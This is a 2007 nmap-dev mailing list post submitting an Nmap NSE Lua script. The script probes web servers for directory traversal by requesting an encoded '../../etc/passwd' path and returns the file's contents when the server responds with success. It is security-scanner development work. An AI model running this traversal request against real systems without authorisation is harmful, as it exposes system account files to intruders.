[NSE Script] HTTP probe for /etc/passwd

[Kris Katterjohn <katterjohn () gmail com>]

Hey everyone!

I attached HTTPpasswd.nse, which is a script to probe for /etc/passwd 
through HTTP servers that are susceptible to directory traversal.

It's my first script that actually does something, so any comments are 
welcome and appreciated.

Thanks,
Kris Katterjohn

-- HTTP probe for /etc/passwd
-- 07/20/2007

-- Started with Thomas Buchanan's HTTPAuth.nse as a base

id = "HTTP /etc/passwd probe"

description = "Probe for /etc/passwd if server is susceptible to directory traversal"

author = "Kris Katterjohn <katterjohn () gmail com>"

license = "Look at Nmap's COPYING"

categories = {"intrusive"}

require "shortport"

portrule = shortport.port_or_service({80, 8080}, "http")

action = function(host, port)
        local socket
        local cmd, response
        local i

        socket = nmap.new_socket()

        socket:connect(host.ip, port.number)

        cmd = "GET " .. string.rep("%2E%2E%2F", 10) .. "etc%2Fpasswd HTTP/1.0\r\n\r\n"

        socket:send(cmd)

        response = ""

        while true do
                local status, lines = socket:receive_lines(1)

                if not status then
                        break
                end

                response = response .. lines
        end

        socket:close()

        -- I thought about doing string.match(response, "HTTP/1.- 4") to see
        -- if it's bad, but I figure I'll check for success instead

        -- Match something like "HTTP/1.0 200 OK"
        if string.match(response, "HTTP/1.- 2") then
                local start, stop = string.find(response, "\r\n\r\n")
                return string.sub(response, stop)
        end

        return
end


_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://SecLists.Org